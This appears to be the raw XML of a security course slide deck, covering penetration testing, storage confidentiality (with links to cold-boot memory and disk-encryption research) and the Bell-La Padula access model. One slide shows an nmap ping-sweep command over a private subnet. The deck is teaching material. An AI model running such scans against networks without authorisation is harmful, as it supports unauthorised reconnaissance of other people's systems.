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87" r:id="rId6"/>
    <p:sldId id="260" r:id="rId7"/>
    <p:sldId id="288" r:id="rId8"/>
    <p:sldId id="263" r:id="rId9"/>
    <p:sldId id="261" r:id="rId10"/>
    <p:sldId id="289" r:id="rId11"/>
    <p:sldId id="262" r:id="rId12"/>
    <p:sldId id="264" r:id="rId13"/>
    <p:sldId id="265" r:id="rId14"/>
    <p:sldId id="267" r:id="rId15"/>
    <p:sldId id="290" r:id="rId16"/>
    <p:sldId id="268" r:id="rId17"/>
    <p:sldId id="266" r:id="rId18"/>
    <p:sldId id="269" r:id="rId19"/>
    <p:sldId id="270" r:id="rId20"/>
    <p:sldId id="271" r:id="rId21"/>
    <p:sldId id="272" r:id="rId22"/>
    <p:sldId id="273"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A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65C773-1577-4911-B448-EB736CAF580A}"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9E912-2CD2-4662-91BA-815634724EE3}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="343496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defTabSz="955675">
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{B22675DC-4653-4CCE-BBE1-78CCBA99E8E9}" type="slidenum">
              <a:rPr lang="it-IT" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr defTabSz="955675">
                <a:defRPr/>
              </a:pPr>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" smtClean="0">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953470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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1419141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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30003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defTabSz="955675">
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{D62B3D6B-8C3D-40E7-95B7-C3CBF95B2E46}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr defTabSz="955675">
                <a:defRPr/>
              </a:pPr>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"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buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" smtClean="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="272325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defTabSz="955675">
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{CC4C79E5-6329-4218-9DFF-FF249755F7D4}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr defTabSz="955675">
                <a:defRPr/>
              </a:pPr>
              <a:t>27</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1674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defTabSz="955675">
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{A60E72E3-F20A-418D-9BD4-07AE0AC0FF0B}" type="slidenum">
              <a:rPr lang="it-IT" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr defTabSz="955675">
                <a:defRPr/>
              </a:pPr>
              <a:t>28</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" smtClean="0">
              <a:latin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39539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idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{5435557B-8326-4E2E-8E3A-014693C61646}" type="slidenum">
              <a:rPr lang="en-GB">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr>
                <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
                <a:buNone/>
                <a:defRPr/>
              </a:pPr>
              <a:t>39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39939" name="Rectangle 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="693738"/>
            <a:ext cx="4570413" cy="3429000"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39940" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4344988"/>
            <a:ext cx="5486400" cy="4113212"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="it-IT" smtClean="0">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="275607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TextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40963" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="it-IT" smtClean="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:extLst/>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{A6DF7ABE-D8CA-428A-BFB5-3797492F743C}" type="slidenum">
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>41</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="236904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defTabSz="955675">
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{B48144F4-489D-4D0F-AC71-FEDB1E963F75}" type="slidenum">
              <a:rPr lang="it-IT" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr defTabSz="955675">
                <a:defRPr/>
              </a:pPr>
              <a:t>42</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" smtClean="0">
              <a:latin typeface="Arial"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it-IT" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>nmap -v -sP 192.168.15.0/24 | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>egrep 'up|MAC'</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="410366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defTabSz="955675">
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{67D897EA-2611-4BE5-B096-DAFD56A235D2}" type="slidenum">
              <a:rPr lang="it-IT" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr defTabSz="955675">
                <a:defRPr/>
              </a:pPr>
              <a:t>52</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"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78660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it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="310471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482DEC-9E85-4EB0-BCA2-B34383921930}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>11/5/2017</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Storage Confidentiality</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403232-A2B8-4552-B777-1605D9DCA9FA}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>11/5/2017</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Storage Confidentiality</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02A1B-2ED5-4610-B1E7-A1729603D4B7}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>11/5/2017</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Storage Confidentiality</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a:xfrm>
            <a:off x="456481" y="273629"/>
            <a:ext cx="8226720" cy="1143480"/>
          </a:xfrm>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p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr smtClean="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{AB4687DE-3DAB-4845-AB8F-B0699581202A}" type="datetime1">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>11/5/2017</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr smtClean="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Penetration Testing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{07A2D887-1B13-46AE-B217-51A09D8F0BC8}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="321352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9AE07-E9AE-4524-AFC8-A9A8F58A201A}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>11/5/2017</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Storage Confidentiality</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672B91-A570-488B-8A93-FAEC252E3D8B}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>11/5/2017</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Storage Confidentiality</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360F9-DBF0-4710-BA6E-EBFFBC93E608}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>11/5/2017</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Storage Confidentiality</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 6"/>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CBAC4-6914-4329-9CC7-AB3915F6A492}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>11/5/2017</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Storage Confidentiality</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Slide Number Placeholder 8"/>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270D6B-B47D-48AA-933B-D6F0DC4CF5D1}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>11/5/2017</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Storage Confidentiality</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>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C21FC-CC94-4BFC-A68A-EB3607AF93A3}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>11/5/2017</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Storage Confidentiality</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>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F8160-627B-4FA1-8200-7A5881BBC705}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>11/5/2017</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Storage Confidentiality</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 6"/>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1F166-0D72-4139-9D89-6BD6B4663809}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>11/5/2017</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Storage Confidentiality</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{94759074-FD2C-4344-8997-BA6EDF992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CDCDF-BC8E-42EF-97F8-9A1107FF635B}" type="datetime1">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Storage Confidentiality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59074-FD2C-4344-8997-BA6EDF99276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osstmm.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nmap.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Microsoft_Excel_97-2003_Worksheet1.xls"/></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http://www.ponemon.org/data-security"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elcomsoft.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download.microsoft.com/download/0/2/3/0238acaf-d3bf-4a6d-b3d6-0a0be4bbb36e/BitLockerCipher200608.pdf"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citp.princeton.edu/memory/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.blackhat.com/html/bh-dc-10/bh-dc-10-archives.html#Tarnovsky" TargetMode="Externa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hyperlink" Target="http://citp.princeton.edu/memory/media/"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ww.schneier.com/paper-truecrypt-dfs.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Policy, Models, and Trust</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Bell-La </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Padula</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Model</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1371600"/>
            <a:ext cx="8382000" cy="1905000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The BLP model has a strict, linear ordering on the security of levels of documents, so that each document has a specific security level in this ordering and each user is assigned a strict level of access that allows them to view all documents with the corresponding level of security or below.</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10</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121875" y="3054804"/>
            <a:ext cx="5040925" cy="36507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Total Orders and Partial Orders</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1143000"/>
            <a:ext cx="8534400" cy="5562600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>A linear ordering for documents can be defined in terms of a comparison rule, . We say that such a rule defines a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>total order </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>on a universe set, U, if it satisfies the following properties:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>Reflexivity: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>If x is in U, then x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="sng" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> x.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Antisymmetry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>If x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="sng" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> y and y </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="sng" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> x, then x = y.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>Transitivity: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>If x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="sng" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> y and y </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="sng" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> z, then x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="sng" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> z.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
